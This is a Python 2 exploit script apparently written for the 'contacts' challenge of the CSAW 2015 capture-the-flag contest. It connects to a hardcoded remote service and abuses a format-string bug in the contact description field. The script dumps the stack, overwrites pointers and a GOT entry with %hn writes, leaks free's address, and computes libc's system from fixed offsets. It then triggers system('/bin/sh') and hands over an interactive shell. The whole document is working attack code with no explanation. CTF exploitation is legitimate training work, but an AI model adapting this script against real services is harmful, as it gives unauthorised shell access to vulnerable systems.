csaw2015 contacts (exploit only)

from zio import *

from time import *

import windowhan

import re

fsb_value = []

def fsbDump(sock,handler,count,spNum):

recv_data = ""

for index in range(1,count+1):

recv_data = handler(sock,index)

if recv_data.find('(nil)')>-1:

fsb_value.append("0x00000000")

else:

fsb_value.append("{0:#0{1}x}".format(int(re.findall("0[xX][0-9a-fA-F]+",recv_data)[0],16),10))

output = ""

string_output = ""

for i in range(0,len(fsb_value),spNum):

output = "[%%%s$p] " % str(i+1)

string_output = ""

for j in range(i,i+spNum):

try:

output += fsb_value[j] + " "

except:

print fsb_value

for k in range(0,len(fsb_value[j].replace("0x","")),2):

if int(fsb_value[j].replace("0x","")[k:k+2],16)>0x20 and int(fsb_value[j].replace("0x","")[k:k+2],16)<0x7f:

string_output += chr(int(fsb_value[j].replace("0x","")[k:k+2],16)) + "."

else:

string_output += ".."

print output + " | " + string_output

return fsb_value

def do_dump(sock,index):

recv_data = ""

sock.write('3' + '\n')

sock.write('aaaa' + '\n')

sock.write('2' + '\n')

sock.write('1000' + '\n')

sock.read_until("Description:")

sock.write('%' + str(index) + '$p ' + '\n')

sock.read_until(">>>")

sock.write('4' + '\n')

recv_data = sock.read_until("Menu:")

return recv_data

def create_contacts(sock,name,phone,descLen,desc):

sock.write("1" + "\n")

sock.read_until("Name:")

sock.write(name + "\n")

sock.read_until("Phone No:")

sock.write(phone + "\n")

sock.read_until("of description:")

sock.write(descLen + "\n")

sock.read_until("Enter description:")

sock.write(desc + "\n")

sock.read_until(">>>")

def remove_contacts(sock,name):

sock.write("2" + "\n")

sock.read_until("remove?")

sock.write(name + "\n")

sock.read_until(">>>")

def edit_desc_contacts(sock,name,newDesc):

sock.write("3" + "\n")

sock.read_until("change?")

sock.write(name + "\n")

sock.read_until(">>>")

sock.write("2" + "\n")

sock.read_until("Length of description:") 

sock.write("3000" + "\n")

sock.read_until("Description:")

sock.write(newDesc + "\n")

sock.read_until(">>>")

def display_contacts(sock):

sock.write("4" + "\n")

recv_data = ""

recv_data = sock.read_until(">>>")

return recv_data.split("Description:")[1].split("Menu:")[0]

def exit_contacts(sock):

sock.write("5" + "\n")

s = zio(('54.208.16.165',2555))

create_contacts(s,'aaaa','123','1243','123')

# overwrite test

"""

s.write('3' + '\n')

s.write('aaaa' + '\n')

s.write('2' + '\n')

s.write('1313' + '\n')

s.read_until('Description:')

s.write('%24929c%6$hn' + '\n')

s.read_until(">>>")

s.write('4' + '\n')

s.read_until(">>>")

"""

dump_data = fsbDump(s,do_dump,10,5)

stack_base = int(dump_data[5],16)&0xffff0000

target_pointer_base1 = (int(dump_data[5],16)&0xffff) + 136

target_pointer_base2 = (int(dump_data[5],16)&0xffff) + 120

# GOT Overwrite

# First Contact

edit_desc_contacts(s,'aaaa','%' + str(target_pointer_base1) + 'c%6$hn')

display_contacts(s)

edit_desc_contacts(s,'aaaa','%45076c%18$hn')

display_contacts(s)

edit_desc_contacts(s,'aaaa','%' + str(target_pointer_base1+2) + 'c%6$hn')

display_contacts(s)

edit_desc_contacts(s,'aaaa','%2052c%18$hn')

display_contacts(s)

remove_contacts(s,'aaaa')

# Second Contact

create_contacts(s,'bbbb','123','1231','%' + str(target_pointer_base2) + 'c%6$hn')

display_contacts(s)

edit_desc_contacts(s,'bbbb','%45078c%18$hn')

display_contacts(s)

edit_desc_contacts(s,'bbbb','%' + str(target_pointer_base2+2) + 'c%6$hn')

display_contacts(s)

edit_desc_contacts(s,'bbbb','%2052c%18$hn')

display_contacts(s)

remove_contacts(s,'bbbb')

# leak free@got 

create_contacts(s,'tttt','123','1231','%52$p')

display_contacts(s)

edit_desc_contacts(s,'tttt','%52$s')

leak_data = display_contacts(s)

windowhan.dump(leak_data)

free_got = leak_data[1:5]

print "[+] free_got : 0x%s" % free_got[::-1].encode('hex')

remove_contacts(s,'tttt')

offset_system = 0x0003fcd0

offset_dup2 = 0x000d9dd0

offset_read = 0x000d9490

offset_write = 0x000d9510

offset_binsh = 0x15da84

offset_free = 0x000760c0

offset = offset_free - offset_system

real_system = int("0x%s" % free_got[::-1].encode('hex'),16) - offset

print "[+] system address : %s" % hex(real_system)

print '[+] %' + str((real_system&0xffff0000)/0x10000)  + 'c%48$hn'

print '[+] %' + str(real_system&0xffff) + 'c%52$hn'

create_contacts(s,'ffff','123','1243','%' + str((real_system&0xffff0000)/0x10000)  + 'c%48$hn')

create_contacts(s,'gggg','123','1233','%' + str(real_system&0xffff) + 'c%52$hn')

display_contacts(s)

print "[+] system address : %s" % hex(real_system)

print "[+] free_got : 0x%s" % free_got[::-1].encode('hex')

create_contacts(s,'/bin/sh','123','1231','/bin/sh')

s.write('2' + '\n')

s.read_until("remove?")

s.write('/bin/sh' + '\n')

s.interact()